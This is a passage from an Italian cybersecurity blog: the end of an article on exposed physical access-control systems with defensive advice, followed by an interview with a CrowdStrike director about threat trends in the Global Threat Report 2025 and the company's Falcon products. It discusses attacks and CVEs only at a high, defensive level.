Oltre al rischio di intrusioni fisiche, l’accesso a questi dati apre la porta a minacce informatiche di alto livello, come attacchi di spear-phishing e social engineering. Conoscere il nome di un dipendente, la sua email e il suo orario di lavoro consente ai cybercriminali di orchestrare attacchi mirati con un’efficacia devastante.

Come proteggersi?

Alcuni vendor hanno dichiarato di essere al lavoro con i clienti per mitigare il problema, ma la lentezza nelle risposte è preoccupante, considerando la gravità della falla.

Le misure per arginare il problema esistono e dovrebbero essere adottate immediatamente:

• Spegnere l’accesso remoto: se il sistema non deve essere accessibile online, meglio rimuoverlo dalla rete pubblica.
• Firewall e VPN: gli AMS devono essere dietro un firewall e accessibili solo tramite VPN sicure.
• Cambio delle credenziali di default: sembra banale, ma molti sistemi sono ancora vulnerabili a brute-force perché usano username e password di fabbrica.
• MFA e aggiornamenti: implementare l’autenticazione multi-fattore e installare gli aggiornamenti di sicurezza più recenti.
• Crittografia e gestione dei dati: i dati biometrici e le informazioni personali devono essere sempre criptati, e i profili di ex-dipendenti devono essere cancellati per evitare usi fraudolenti.

Conclusione

Questa scoperta dei ricercatori di Modat evidenzia come la sicurezza fisica e informatica siano ormai inscindibili. Una vulnerabilità nel mondo digitale può avere conseguenze devastanti nel mondo reale. Se le aziende e le istituzioni non prenderanno provvedimenti immediati, le conseguenze potrebbero essere disastrose. La domanda è: quanti altri sistemi critici sono esposti senza che nessuno se ne accorga?

L'articolo Italia e Sicurezza Fisica a Rischio! 16.678 Dispositivi di Controllo Accessi Esposti Online proviene da il blog della sicurezza informatica.

Nel panorama odierno della sicurezza informatica, CrowdStrike si distingue come uno dei leader più innovativi e influenti. Fondata nel 2011 da George Kurtz, Dmitri Alperovitch e Gregg Marston, l’azienda ha rapidamente guadagnato una reputazione per la sua capacità di rilevare e prevenire minacce informatiche avanzate. Con una combinazione di tecnologie all’avanguardia, intelligenza artificiale e un team di esperti di sicurezza, CrowdStrike è diventata una forza trainante nella protezione delle organizzazioni contro gli attacchi informatici.

In questa intervista a Luca Nilo Livrieri, Director, Sales Engineering Southern Europe di CrowdStrike, discuteremo delle sfide attuali che le aziende devono affrontare nel campo della sicurezza informatica e di come CrowdStrike sta rispondendo a queste minacce in continua evoluzione. Inoltre, parleremo del ruolo dell’intelligenza artificiale nella protezione dei dati e delle infrastrutture critiche.

La soluzione di maggior interesse fornita da CrowdStrike è la sua piattaforma Falcon, che utilizza una combinazione di analisi comportamentale e intelligenza artificiale per rilevare e rispondere alle minacce in tempo reale. Questa tecnologia ha rivoluzionato il modo in cui le aziende possono proteggere i loro sistemi, offrendo una visibilità senza precedenti sulle attività sospette e consentendo una risposta rapida ed efficace.

Luca non mancherà di discutere delle tendenze future nel campo della sicurezza informatica e di come CrowdStrike si sta preparando per affrontare le nuove sfide che di giorno in giorno emergono. Con l’aumento della digitalizzazione e l’espansione delle superfici di attacco, la capacità di adattarsi rapidamente e di innovare è cruciale per mantenere la sicurezza delle informazioni.
Luca Nilo Livrieri, Director, Sales Engineering Southern Europe di CrowdStrike
Accenneremo inoltre a come le attuali tensioni geopolitiche e conflitti globali, come gli scenari Ucraina/Russia, Cina/Taiwan stanno influenzando la natura e la frequenza degli attacchi cyber.

1-RHC: Il vostro Global Threat Report annuale (GTR 2025) riassume l’analisi del team di intelligence di CrowdStrike effettuata nel corso del 2024 e descrive temi, tendenze ed eventi di rilievo nel panorama delle minacce informatiche. Questo report annuale include anche valutazioni anticipate delle minacce per aiutare le organizzazioni a prepararsi e a proteggersi durante il prossimo anno. Potrebbe condividere con noi alcune delle principali tendenze e minacce emerse dal report di quest’anno e come le aziende possono utilizzare queste informazioni per migliorare la propria postura digitale per il futuro?

Luca Nilo Livrieri: Il report evidenzia alcune tendenze significative in relazione alle tipologie di attacchi: il 79% degli attacchi rilevati da CrowdStrike nel 2024 risulta aver operato senza malware, utilizzando cioè strumenti legittimi già presenti nell’ambiente della vittima, e rendendo quasi impossibile distinguere l’attività malevole. Si parla quindi di intrusioni interattive o “hands-on”. Un dato altrettanto interessante emerso è l’aumento di attacchi che sfruttano tecniche di social engineering – vishing e call back phishing su tutte. Tenendo conto di queste tendenze, le aziende devono focalizzarsi su diversi aspetti: innanzitutto su una protezione delle identità, che vengono spesso usate dagli attaccanti come initial access, e poi su un rafforzamento delle soluzioni di rilevamento in real time basate su behaviour e, infine, sull’utilizzo di soluzioni di IA per aumentare la velocità della detection, investigation e response. Dal punto di vista organizzativo è necessario formare il personale a difendersi dal social engineering, implementare workflow automatizzati di remediation e sviluppare capacità di threat hinting a 360°su tutto il perimetro aziendale

2-RHC: Quali sono i trend nello eCrime? Quanto sono diffusi attacchi tramite malware rispetto ad attacchi mirati alle identità che non prevedano l’utilizzo di malware e/o includano l’uso di social engineering potenziato eventualmente dall’Intelligenza Artificiale Generativa (GenAI) (come ad esempio con video DeepFake)?

Luca Nilo Livrieri: Secondo l’analisi che abbiamo svolto nel 2024, come accennato nella risposta alla precedente domanda, vi è stata un’alta percentuale (79%) di attacchi senza utilizzo di malware e basati su tecniche “hands-on-keyboard” e strumenti legittimi: si preferiscono quindi metodi “fileless” e living-off-the-land. Gli attacchi alle identità risultano i più frequenti, essendo ormai da anni un trend in crescita. A tal proposito si è registrato, ad esempio, un aumento del 442% negli attacchi di vishing nella seconda metà del 2024 e un crescente utilizzo di GenAI per la creazione di contenuti più convincenti a supporto nelle operazioni di social engineering.

L’utilizzo dell’intelligenza artificiale ha supportato un’evoluzione delle tattiche dal phishing tradizionale verso tecniche alternative (vishing e callback) con un aumento dell’efficacia significativo, se in passato la classica email di phishing aveva un’efficacia del 12%, oggi la stessa email generata con l’AI ha un’efficacia del 54%.

3-RHC: Kevin Mitnick, noto come “il Condor”, è stato uno degli hacker più famosi e abili della storia. La sua carriera di hacking iniziò negli anni ’80, quando si dedicò al phreaking, ovvero l’hacking dei sistemi telefonici. Mitnick era un maestro nell’arte dell’ingegneria sociale, utilizzando tecniche di manipolazione psicologica per ottenere informazioni riservate direttamente dalle persone al telefono.

Quanto è ancora importante per le organizzazioni educare gli utenti a riconoscere tentativi di attacco tramite di voice phishing (vishing)?

Luca Nilo Livrieri: L’eredità delle tecniche di social engineering di Kevin Mitnick è più rilevante che mai nel panorama attuale delle minacce informatiche. L’allarmante aumento negli attacchi di vishing (del 442%), già citato, ha dimostrato come questa tecnica tradizionale si sia evoluta e rafforzata grazie alle nuove tecnologie.

Le tecniche di manipolazione psicologica che Mitnick utilizzava negli anni ’80 sono state potenziate dall’intelligenza artificiale e dalle tecnologie di clonazione vocale, rendendo gli attacchi di vishing significativamente più convincenti e difficili da identificare. Gli attaccanti moderni sfruttano ancora le stesse vulnerabilità umane – urgenza, autorità e fiducia – ma avendo a disposizione strumenti molto più sofisticati.

L’evoluzione tecnologica ha permesso di automatizzare e scalare questi attacchi, integrandoli con altri vettori di minaccia. La capacità di generare “voci clone” realistiche e di orchestrare attacchi su larga scala rende senza dubbio il vishing una minaccia ancora più seria rispetto al passato. É fondamentale per le organizzazioni proteggersi investendo nella formazione continua del personale, conducendo simulazioni realistiche e assicurando un aggiornamento costante della consapevolezza sulle nuove tecniche di attacco. Questa formazione deve essere supportata da solidi controlli tecnici, come l’autenticazione multi-fattore e protocolli di verifica delle richieste sensibili. Le organizzazioni devono inoltre stabilire procedure chiare e verificabili per la gestione delle richieste sensibili, definendo canali di comunicazione sicuri e implementando sistemi efficaci per il reporting di tentativi sospetti. La combinazione tra consapevolezza umana e controlli tecnici rimane la migliore difesa contro il vishing moderno, proprio come ai tempi di Mitnick, purché tenga conto della necessità di strumenti e procedure specificamente adattati alle sfide contemporanee

4-RHC: Sempre in merito ai trend, pensando alle vittime dello eCrime, potrebbe indicarci delle statistiche riguardo i settori verticali più significativi nelle aree geografiche più importanti?

Luca Nilo Livrieri:Il Global Threat Report 2025 di CrowdStrike rivela un quadro complesso e preoccupante della distribuzione degli attacchi eCrime a livello globale e settoriale. L’analisi mostra come gli attori delle minacce abbiano intensificato significativamente le loro attività, con un’attenzione particolare al settore finanziario, che ha subito un drammatico aumento degli attacchi, specialmente da parte di gruppi legati alla Cina – con incrementi che hanno raggiunto il 200-300%.

A livello globale il Nord America continua a essere un obiettivo primario, particolarmente per quanto riguarda le istituzioni finanziarie e le aziende tecnologiche. L’Europa ha visto una concentrazione di attacchi diretti al settore manifatturiero e ai servizi finanziari, mentre nella regione Asia-Pacifico gli attaccanti hanno mostrato un interesse particolare per il settore industriale e manifatturiero.

Il settore sanitario e le infrastrutture critiche rimangono obiettivi di elevato interesse strategico a livello globale, con un’intensificazione degli attacchi particolarmente evidente nelle economie più sviluppate.

5-RHC: Oggi, la Cina è una delle principali economie mondiali, con un forte settore manifatturiero orientato all’esportazione. Qual è oggi la portata di operazioni di spionaggio informatico da parte di attori cinesi? La maturità degli attaccanti cinesi è aumentata in modo proporzionato all’aumento del loro potere economico?

Luca Nilo Livrieri:Il Global Threat Report 2025 di CrowdStrike rivela un incremento sostanziale delle operazioni cyber cinesi, con un aumento complessivo del 150% trasversale su tutti i settori, con punte fino al 200-300% in ambiti strategicamente cruciali come il settore finanziario, mediatico, manifatturiero e ingegneristico-industriale. Questa escalation nelle attività di cyber-spionaggio riflette chiaramente l’ambizione cinese di consolidare la propria posizione di leadership tecnologica e industriale a livello globale. La maturazione delle capacità offensive cinesi è particolarmente evidente nell’evoluzione delle tattiche operative: gli attaccanti hanno abbandonato approcci più tradizionali e facilmente rilevabili in favore di metodologie più sofisticate e difficili da attribuire. Particolarmente significativa è la loro capacità di condurre operazioni stealth che evitano l’uso di malware, a favore di tecniche più sottili che sfruttano le vulnerabilità della supply chain e garantiscono una persistenza duratura nei sistemi compromessi. Questa evoluzione tecnica dimostra un chiaro allineamento con gli obiettivi strategici nazionali cinesi, come definiti nei piani quinquennali e nelle iniziative di sviluppo tecnologico del paese. La sofisticazione crescente degli attacchi cinesi rispecchia gli ingenti investimenti del paese in tecnologia e innovazione, creando una sinergia preoccupante tra potere economico e capacità cyber offensive. Per le organizzazioni globali, specialmente quelle operanti in settori strategici o quelle per le quali la proprietà intellettuale risulta un asset particolarmente significativo, questa evoluzione rappresenta una sfida crescente che richiede un approccio difensivo sempre più sofisticato e stratificato.

La minaccia rappresentata dagli attori cinesi non è più solo una questione di sicurezza informatica, ma si inserisce in un più ampio contesto di competizione geopolitica e tecnologica globale, richiedendo una risposta coordinata che coinvolga sia aspetti tecnici che strategici.

6-RHC: Considerando che, in base al vostro report GTR 2025, almeno cinque diversi threat actors state-sponsored legati alla Cina, come ad esempio APT41 (a.k.a. Wicked PANDA), utilizzano ora il malware KEYPLUG anche offuscando le loro attività attraverso reti ORB (Operational Relay Box), quali sono le principali caratteristiche di questo malware che lo rendono così versatile e resistente, e quali strategie possono adottare le organizzazioni per rilevare e mitigare tali minacce?

Luca Nilo Livrieri:KEYPLUG è un malware a bassa prevalenza, il che lo rende meno rilevabile rispetto ad altri malware più diffusi. Il suo impatto sul panorama delle minacce cyber è particolarmente significativo e ha contribuito a innalzare il livello generale di sofisticazione delle minacce. La sua condivisione tra diversi gruppi ha portato infatti a un continuo perfezionamento delle sue capacità, che l’hanno reso sempre più efficace e difficile da rilevare. La natura collaborativa dello sviluppo di KEYPLUG tra diversi gruppi di minacce cinesi sottolinea la necessità di un approccio alla sicurezza sempre più sofisticato e adattivo, capace di evolversi al passo con le crescenti capacità degli attaccanti.

Tra le caratteristiche di questo malware si trova l’utilizzo di chiavi RC4 definite dagli attori per crittografare le comunicazioni di rete, rendendo più difficile l’intercettazione e l’analisi del traffico. KEYPLUG utilizza server C2 con una durata mediana di 96 giorni, con variazioni significative tra i diversi gruppi di avversari, il che complica ulteriormente il tracciamento e la mitigazione. Per cifrare le comunicazioni tra i server C2 e i client, KEYPLUG utilizza certificati TLS auto-firmati, spesso con valori di campo predefiniti, per evitare il rilevamento. Tra le strategie che le organizzazioni possono adottare per rilevarne e mitigarne le minacce suggeriamo l’implementazione di soluzioni di monitoraggio del traffico di rete per identificare comportamenti anomali e comunicazioni sospette con server C2 noti. É consigliabile mantenere aggiornate le firme di rilevamento nei sistemi di sicurezza per includere gli indicatori di compromissione (IOC) associati a KEYPLUG, come gli indirizzi IP e i domini C2. Occorre verificare e analizzare i certificati TLS utilizzati nelle comunicazioni di rete per identificare quelli auto-firmati e sospetti. E’ necessario anche implementare la segmentazione della rete per limitare i movimenti laterali degli attaccanti e contenere eventuali compromissioni e, infine, educare il personale sulla sicurezza informatica e sulle tecniche di phishing per ridurre il rischio di compromissioni iniziali.

7-RHC: Restando in tema geografico/geopolitico, nell’ultimo decennio si è registrato un aumento delle attività criminali informatiche sponsorizzate dallo stato, (ad esempio il caso della violazione di SolarWinds, collegata alla Russia, che ha colpito la maggior parte dei governi e delle organizzazioni non governative statunitensi). Viste le recenti tensioni e conflitti (Cina/Taiwan, Russia/Ucraina, Israele/Hamas) il vostro team di cyber threat intelligence cosa ha osservato?

Luca Nilo Livrieri:Il panorama delle minacce cyber nel 2024 ha riflesso in modo significativo le crescenti tensioni geopolitiche globali, come evidenziato dal team di cyber threat intelligence di CrowdStrike. L’anno ha visto un’intensificazione senza precedenti delle attività criminali informatiche sponsorizzate da stati nazionali, con Cina, Russia e Corea del Nord in prima linea.

Nel GTR 2025 abbiamo identificato 26 nuovi avversari, portando il totale degli attori mappati a 257. La Cina ha dimostrato una notevole evoluzione nelle sue capacità offensive, registrando un incremento del 150% nelle attività di spionaggio informatico rispetto al 2023. (VEDI RISPOSTA 9 con dettaglio).

Sul fronte russo, le attività cyber sono state fortemente influenzate dal conflitto in Ucraina. Gli attori russi hanno mantenuto una presenza aggressiva nel cyberspazio, concentrandosi sulla raccolta di intelligence relativa all’Ucraina e ai membri della NATO. Le loro operazioni hanno dimostrato una notevole capacità di adattamento e di sviluppo di tecniche sempre più sofisticate.

La Corea del Nord ha invece mostrato un approccio distintivo, focalizzandosi principalmente sulla generazione di valuta attraverso operazioni cyber innovative. Il regime ha sviluppato schemi elaborati che includono frodi nel settore IT, utilizzando tattiche come interviste virtuali e “laptop farms”. Questa strategia riflette il tentativo del paese di aggirare le sanzioni internazionali attraverso mezzi cyber.

Il quadro complessivo emerso nel report evidenzia come le tensioni geopolitiche si siano tradotte in un’escalation significativa delle attività cyber sponsorizzate dagli stati. Questi attori hanno dimostrato una crescente sofisticazione nelle loro operazioni, integrando perfettamente le attività cyber con più ampi obiettivi strategici e geopolitici. Tale evoluzione sottolinea l’importanza crescente del dominio cyber come teatro di operazioni per il perseguimento di obiettivi statali, richiedendo un approccio sempre più sofisticato alla cybersecurity e una maggiore cooperazione internazionale nella risposta a queste minacce.

8-RHC: Riguardo la Corea del Nord, cosa avete osservato nei gruppi criminali che sono attivi per finanziare il regime di Pyongyang?

Luca Nilo Livrieri:Nel corso del 2024 il nostro team di cyber threat intelligence ha osservato che i gruppi criminali nordcoreani hanno continuato a focalizzarsi su operazioni informatiche atte a finanziare il regime di Pyongyang. Tra i principali elementi emersi dal nostro report c’è una innovazione nelle Operazioni di E-Crime: gruppi nordcoreani hanno innovato le loro operazioni di monetizzazione, utilizzando schemi di lavoro IT su larga scala in tutto il mondo.

È emerso come gruppo particolarmente attivo FAMOUS CHOLLIMA (304 incidenti legati a FAMOUS CHOLLIMA tracciati da CrowdStrike nel 2024). Quasi il 40% di questi incidenti rappresentava operazioni di insider threat.

I gruppi nordcoreani hanno utilizzato tecniche di social engineering per supportare la creazione di profili LinkedIn falsi con testi generati da strumenti di intelligenza artificiale generativa (genAI) e hanno sfruttato l’AI per fornire risposte più credibili durante i colloqui di lavoro. Con queste tecniche è stato possibile ingannare i recruiter e farsi assumere all’interno di grandi aziende come sviluppatori di software e tecnici IT. I “dipendenti” si facevano spedire i laptop aziendali in dotazione presso “Laptop farms” in paesi specifici per ottenere un IP pubblico di provenienza “trusted” (es. USA) e, una volta ottenuto l’accesso alle reti aziendali, installavano sui computer delle aziende strumenti di gestione remota (RMM) e estensioni del browser malevole per esfiltrare dati o eseguire altre attività malevole.

9-RHC: In base alle vostre indagini di intelligence, chi ha dominato nel 2024 il Threat Landscape a livello globale?

Luca Nilo Livrieri:Nel 2024 il panorama delle minacce cyber globali è stato caratterizzato da una predominanza significativa degli attori legati alla Cina, come già evidenziato. Le operazioni di spionaggio informatico cinesi hanno raggiunto livelli di maturità senza precedenti, registrando un incremento del 150% rispetto all’anno precedente. Questa escalation è stata accompagnata da un notevole perfezionamento delle capacità operative e della gestione infrastrutturale, in particolare attraverso l’implementazione sofisticata di reti di relay box operativi (ORB) per mascherare le loro attività.

Un aspetto particolarmente significativo del 2024 è stata l’identificazione infatti di sette nuovi attori legati alla Cina. Questo rappresenta un’evoluzione strategica importante, segnando il passaggio da operazioni di tipo “smash-and-grab” a intrusioni più mirate e sofisticate, ciascuna con obiettivi specifici e ben definiti.

La risposta degli attori cinesi alle crescenti misure di contrasto implementate da governi, forze dell’ordine e ricercatori di sicurezza, è stata notevole. Hanno intensificato l’uso di tecniche di offuscamento, sfruttando reti ORB e condividendo strumenti tra diversi gruppi, dimostrando una maggiore resilienza operativa e capacità di mantenere l’anonimato.

L’impatto di queste operazioni si è fatto sentire in modo trasversale in tutti i settori a livello globale, con un’intensità particolare in alcuni ambiti strategici. I settori dei servizi finanziari, mediatico, manifatturiero e ingegneria industriale hanno registrato aumenti drammatici nelle attività malevole, con incrementi che hanno raggiunto il 200-300% rispetto agli anni precedenti.

10-RHC: Diamo ora uno sguardo alla difesa, può spiegare come Falcon Adversary OverWatch, Falcon Next-Gen SIEM (crowdstrike.com/platform/next-…) ed i Counter Adversary Playbooks possano aiutare nel creare programmi di monitoraggio/intelligence completi e personalizzati?

Luca Nilo Livrieri:La combinazione di Falcon Adversary OverWatch, Falcon Next-Gen SIEM e Counter Adversary Playbooks rappresenta un approccio integrato alla sicurezza che permette di creare programmi di monitoraggio e intelligence altamente efficaci e personalizzati. Falcon Adversary OverWatch fornisce un monitoraggio proattivo 24/7 delle attività sospette, con analisti esperti che valutano in tempo reale potenziali minacce. Questo servizio è particolarmente efficace nell’identificare le tattiche hands-on-keyboard e le tecniche di living-off-the-land che, come evidenziato nel GTR 2025, rappresentano il 79% delle intrusioni rilevate.

La capacità di OverWatch di distinguere tra attività legittime e malevole è cruciale, specialmente considerando la crescente sofisticazione degli attacchi. Falcon Next-Gen SIEM amplifica queste capacità integrando e correlando dati da diverse fonti in un’unica piattaforma di gestione degli eventi di sicurezza. La soluzione sfrutta l’intelligenza artificiale e il machine learning per analizzare grandi volumi di dati, identificando pattern sospetti e anomalie che potrebbero indicare un’intrusione. La sua architettura cloud-native permette una scalabilità e flessibilità superiori rispetto ai SIEM tradizionali. I Counter Adversary Playbooks completano il quadro fornendo procedure operative standardizzate e best practice specifiche per contrastare determinate tipologie di attaccanti. Questi playbook, basati su anni di osservazione e analisi delle tattiche degli avversari, permettono di: anticipare le mosse degli attaccanti, implementare contromisure mirate, accelerare i tempi di risposta agli incidenti e standardizzare le procedure di risposta.

L’integrazione di questi tre elementi permette di creare un programma di sicurezza che non solo rileva e risponde alle minacce, ma le anticipa e le previene attivamente, adattandosi continuamente all’evoluzione del panorama delle minacce. La personalizzazione di questi strumenti consente inoltre di allineare le difese alle specifiche esigenze e rischi dell’organizzazione, creando un sistema di protezione su misura e altamente efficace.

11-RHC: Quali sono i punti di forza del vostro prodotto Falcon Next-Gen SIEM? In cosa vi distinguete rispetto ai vostri competitor?

Luca Nilo Livrieri: Falcon Next-Gen SIEM si distingue nel mercato per diverse caratteristiche innovative e vantaggi competitivi significativi. La piattaforma si basa su un’architettura cloud-nativa che elimina la necessità di infrastrutture on-premise complesse, offrendo scalabilità immediata e costi operativi ridotti. Questa architettura moderna permette di processare e analizzare in tempo reale volumi di dati enormi, senza i limiti tradizionali dei SIEM legacy. Un punto di forza distintivo è l’integrazione nativa con l’ecosistema Falcon, che fornisce un contesto di threat intelligence immediato e accurato. Questo significa che ogni alert viene automaticamente arricchito con informazioni contestuali provenienti dal vasto database di minacce di CrowdStrike, permettendo una valutazione più rapida e precisa delle minacce.

La piattaforma eccelle nell’analisi comportamentale, utilizzando algoritmi di machine learning avanzati per identificare anomalie e potenziali minacce. Questo approccio è particolarmente efficace nel rilevare attacchi sofisticati che potrebbero sfuggire ai sistemi tradizionali, come le tecniche “living off the land” e gli attacchi senza malware che, come evidenziato nel GTR 2025, rappresentano la maggioranza delle intrusioni moderne. Un altro elemento distintivo è la capacità di fornire visibilità completa attraverso diversi ambienti – cloud, on-premise e ibridi – con una singola console di gestione. Questo elimina i silos informativi e semplifica significativamente le operazioni di security.

La piattaforma include anche capacità avanzate di automazione e orchestrazione, che permettono di rispondere rapidamente agli incidenti riducendo i tempi di risposta e il carico di lavoro manuale per i team di sicurezza. Infine, il modello di pricing trasparente e prevedibile, basato su sottoscrizione, elimina i costi nascosti tipici dei SIEM tradizionali legati all’ingestione e alla conservazione dei dati. Queste caratteristiche, combinate con il supporto continuo del team CrowdStrike e l’accesso a threat intelligence costantemente aggiornata, rendono Falcon Next-Gen SIEM una soluzione all’avanguardia nel panorama della sicurezza informatica.

12-RHC: Per quanto riguarda tattiche, tecniche e procedure (TTP) dei threat actors, in base al vostro monitoraggio durante il 2024, qual è stata la frequenza di attacchi attraverso lo sfruttamento vulnerabilità consecutive (exploit chaining), con l’abuso di funzionalità legittime (tecniche LOTL, Living Off The Land) o con Zero Days?

Vi sono possibili previsioni su questo per il 2025?

Luca Nilo Livrieri: Nel 2024 CrowdStrike ha osservato un aumento significativo nell’uso di tattiche, tecniche e procedure (TTP) avanzate da parte degli attori delle minacce, in particolare attraverso lo sfruttamento di vulnerabilità consecutive (exploit chaining), l’abuso di funzionalità legittime (tecniche LOTL, Living Off The Land) e l’uso di vulnerabilità zero-day.

Per quanto riguarda l’Exploit Chaining, gli attori delle minacce hanno frequentemente utilizzato catene di exploit per combinare più vulnerabilità e ottenere esecuzione di codice remoto (RCE) non autenticata. Ad esempio, nel novembre 2024, sono stati osservati attori che hanno combinato una vulnerabilità di bypass (CVE-2024-0012) con una vulnerabilità di escalation dei privilegi (CVE-2024-9474) nel software PAN-OS di Palo Alto Networks. Questo approccio ha consentito agli attori di aumentare le proprie capacità e l’impatto sugli obiettivi.

Essi hanno continuato a sfruttare funzionalità legittime (LOTL) dei sistemi per eseguire attacchi. Ad esempio, la funzionalità xp_cmdshell di Microsoft SQL Server è stata abusata per ottenere RCE in vari prodotti.

Gli attaccanti hanno continuato a sfruttare, inoltre, vulnerabilità zero-day per ottenere accesso iniziale e condurre attività malevole. Ad esempio, nel settembre 2024, un attore sconosciuto ha sfruttato una vulnerabilità di divulgazione di file (CVE-2024-21287) per ottenere credenziali in chiaro e successivamente ha sfruttato una vulnerabilità di deserializzazione (CVE-2024-20953) per compromettere i dispositivi.

CrowdStrike prevede che queste tattiche continueranno a essere prevalenti e si evolveranno ulteriormente nel 2025: l’exploit chaining, l’abuso di funzionalità legittime e lo sfruttamento di zero-day continueranno a rappresentare una minaccia significativa, richiedendo alle organizzazioni di adottare misure proattive.

13-RHC: L’abuso di account validi è diventato il principale vettore di accesso iniziale; le credenziali spesso vengono ottenute attraverso l’uso di information stealers o il social engineering.

Qual è l’impatto di ciò in attacchi a infrastrutture cloud aziendali?

Luca Nilo Livrieri: L’abuso di account validi è emerso come vettore principale di accesso iniziale agli ambienti cloud aziendali, rappresentando una minaccia significativa per la sicurezza delle infrastrutture cloud moderne.

Secondo il GTR 2025 questa tendenza ha registrato un impatto particolarmente rilevante, con un 35% di incidenti cloud legati proprio all’abuso di credenziali legittime che si lega al dato relativo agli annunci pubblicitari di credenziali degli access broker che sono aumentati del 50% su base annua.

Gli attaccanti hanno perfezionato le loro strategie di acquisizione delle credenziali, utilizzando principalmente due approcci: l’impiego di information stealers e di sofisticate tecniche di social engineering. Una volta ottenuto l’accesso iniziale attraverso credenziali valide, gli attori delle minacce possono muoversi lateralmente nell’ambiente cloud senza destare sospetti, sfruttando la legittimità apparente delle loro azioni per eludere i sistemi di sicurezza tradizionali.

La persistenza negli ambienti compromessi viene spesso stabilita attraverso la registrazione di dispositivi per l’autenticazione MFA o la creazione di backdoor sofisticate. Ciò permette agli attaccanti di mantenere l’accesso anche dopo eventuali modifiche alle credenziali iniziali. Particolarmente preoccupante è la capacità di questi attori di eludere le difese tradizionali, poiché l’uso di credenziali legittime rende estremamente difficile distinguere le attività malevoli da quelle lecite.

SCATTERED SPIDER, ad esempio, ha dimostrato particolare abilità nell’utilizzare account SSO compromessi per accedere a applicazioni critiche come SharePoint e Outlook, evidenziando la vulnerabilità delle soluzioni SaaS a questo tipo di attacchi. Questa tendenza è destinata a intensificarsi nel 2025, in quanto ci si aspetta che gli attaccanti continueranno a perfezionare le loro tecniche di evasione e a concentrarsi sempre più su obiettivi SaaS e cloud.

Per contrastare questa minaccia crescente, le organizzazioni devono implementare misure di sicurezza avanzate che vadano oltre la semplice protezione perimetrale. È essenziale adottare un approccio multilivello che includa il monitoraggio comportamentale, l’analisi delle anomalie e sistemi robusti di gestione delle identità e degli accessi. Solo attraverso una strategia di sicurezza completa e integrata sarà possibile mitigare efficacemente il rischio rappresentato dall’abuso di account validi negli ambienti cloud.

14-RHC: Ripensando agli attacchi in cui vengono sfruttate vulnerabilità di tipo Zero Day, è possibile rimanere un passo avanti (o almeno allo stesso passo) rispetto alla intraprendente esuberanza e alle continue innovazioni della criminalità digitale? Può l’attuale Intelligenza Artificiale Generativa (GenAI) essere di aiuto in questo?

Luca Nilo Livrieri:La sfida posta dalle vulnerabilità Zero Day nel panorama attuale della cybersecurity rappresenta una delle problematiche più complesse da affrontare, come evidenziato dai dati del GTR 2025. La rapidità con cui gli attaccanti riescono a sfruttare queste vulnerabilità, con tempi di “breakout” ridotti a una media di 48 minuti e picchi di efficienza di soli 51 secondi, impone un ripensamento radicale delle strategie difensive tradizionali.

L’Intelligenza Artificiale Generativa emerge come strumento potenzialmente rivoluzionario in questo contesto. La sua capacità di analizzare pattern complessi, generare scenari predittivi, e automatizzare risposte in tempo reale offre certamente nuove possibilità. L’implementazione di sistemi GenAI avanzati permette di sviluppare approcci proattivi alla sicurezza, anticipando potenziali vettori di attacco attraverso l’analisi predittiva e la simulazione di scenari complessi.

Nel contesto specifico delle vulnerabilità Zero Day, la GenAI dimostra particolare efficacia nell’analisi del codice sorgente e nell’identificazione di potenziali vulnerabilità prima che possano essere sfruttate. La sua capacità di processare e correlare enormi quantità di dati in tempo reale permette di identificare anomalie comportamentali e pattern sospetti che potrebbero indicare lo sfruttamento di vulnerabilità non ancora documentate. Tuttavia, è fondamentale riconoscere che la GenAI non rappresenta una soluzione definitiva, ma piuttosto un potente strumento da integrare in una strategia di sicurezza più ampia. L’efficacia di questi sistemi dipende infatti dalla qualità dei dati di addestramento e dalla loro continua ottimizzazione attraverso il feedback degli analisti di sicurezza. La componente umana rimane quindi essenziale, specialmente nell’interpretazione contestuale delle minacce e nella definizione delle strategie di risposta.

La vera innovazione risiede nella sinergia tra expertise umana e capacità computazionali della GenAI, sinergia che permette di sviluppare sistemi di difesa adattivi che possano evolversi rapidamente in risposta a nuove minacce, mantenendo al contempo la capacità di discriminazione e il giudizio critico necessari per evitare falsi positivi e ottimizzare le risorse di sicurezza. L’implementazione di framework di sicurezza basati su GenAI richiede un approccio olistico che includa monitoraggio continuo, threat hunting proattivo e capacità di risposta rapida agli incidenti. La formazione continua del personale di sicurezza nell’utilizzo efficace di questi strumenti diventa cruciale per massimizzare il potenziale.

L’integrazione della GenAI nelle strategie di sicurezza moderne offre infatti la possibilità di ridurre significativamente il divario temporale tra l’identificazione di una vulnerabilità e la sua mitigazione. Questo, combinato con approcci tradizionali di sicurezza e expertise umana, rappresenta attualmente la migliore strategia per mantenere una postura di sicurezza robusta di fronte all’evoluzione continua delle minacce Zero Day.

15-RHC: Ci può parlare di Charlotte AI, il vostro Generative AI Assistant? Siamo curiosi di sapere come è stato addestrato e su che stack tecnologico hardware/software sia basato (https://www.crowdstrike.com/en-us/resources/demos/conversations-with-charlotte-ai-at-risk-user-accounts/).

Luca Nilo Livrieri: Charlotte AI rappresenta un’implementazione di un sistema di intelligenza artificiale generativa con capacità agentic, che abbiamo integrato nativamente nella piattaforma Falcon di CrowdStrike. L’architettura multi-tenant, cloud-native, dell’assistente è stata progettata per operare su scala enterprise, processando petabyte di dati telemetrici in tempo reale attraverso una sofisticata infrastruttura distribuita.

L’architettura di machine learning sfrutta tecniche avanzate di transfer learning da modelli pre-addestrati, con fine-tuning continuo su dati cliente, ensemble methods per migliorare l’accuracy e sofisticati feedback loop per continuous learning. Il sistema di monitoring fornisce telemetria real-time delle performance, metriche di accuracy e precision, latency tracking e resource utilization monitoring.

Questa implementazione tecnica rappresenta un significativo avanzamento nell’applicazione di tecnologie AI alla cybersecurity, combinando modelli di machine learning all’avanguardia con architetture distribuite scalabili. La piattaforma evolve continuamente attraverso l’introduzione di nuove capacità tecniche e ottimizzazioni delle performance, mantenendo un focus sulla scalabilità enterprise e sulla sicurezza dei dati.

L’architettura modulare garantisce l’adattabilità alle minacce emergenti e alle esigenze, sempre in evoluzione, dei team di sicurezza, permettendo l’integrazione continua di nuovi modelli e capacità analitiche aiutando nelle fasi di detection, investigation e response.

16-RHC: Luca, la ringraziamo ancora per averci dato la possibilità di farle questa intervista sul vostro Global Threat Report 2025. C’è qualcosa che vuole aggiungere o che reputa interessante porre all’attenzione dei nostri lettori?

Luca Nilo Livrieri: Si, mi piacerebbe chiudere con qualche raccomandazione e best practices che suggeriamo di seguire:

1. Proteggere l’intero ecosistema delle identità adottando MFA resistenti al phishing, implementando politiche di accesso forti e utilizzando strumenti di rilevamento delle minacce alle identità integrati con piattaforme XDR.
